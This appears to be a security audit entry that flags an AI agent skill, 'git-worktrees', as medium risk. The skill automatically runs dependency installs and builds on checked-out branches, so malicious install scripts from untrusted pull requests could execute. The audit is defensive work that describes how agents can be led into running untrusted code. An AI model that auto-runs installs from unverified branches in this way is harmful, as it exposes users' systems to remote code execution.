git-worktrees
Warn
Audited by Gen Agent Trust Hub on Apr 23, 2026
Risk Level: MEDIUMREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The 'How to Create Worktree' workflow instructs the agent to automatically detect and run dependency installation commands (such as
npm install,pip install,bun install, etc.) immediately after checking out a branch into a new worktree. This behavior can be exploited if a branch, particularly from an external Pull Request, contains malicious scripts in configuration files likepackage.jsonthat execute during installation. - [EXTERNAL_DOWNLOADS]: The skill triggers automated downloads from public package registries including NPM, PyPI, and Cargo based on the contents of untrusted branches without requiring prior human verification of the manifest files.
- [COMMAND_EXECUTION]: The skill performs shell command execution for dependency management and project building (e.g.,
cargo build,composer install) derived from the file structure of the checked-out branch, which represents an unverified execution path for code from external sources.
Audit Metadata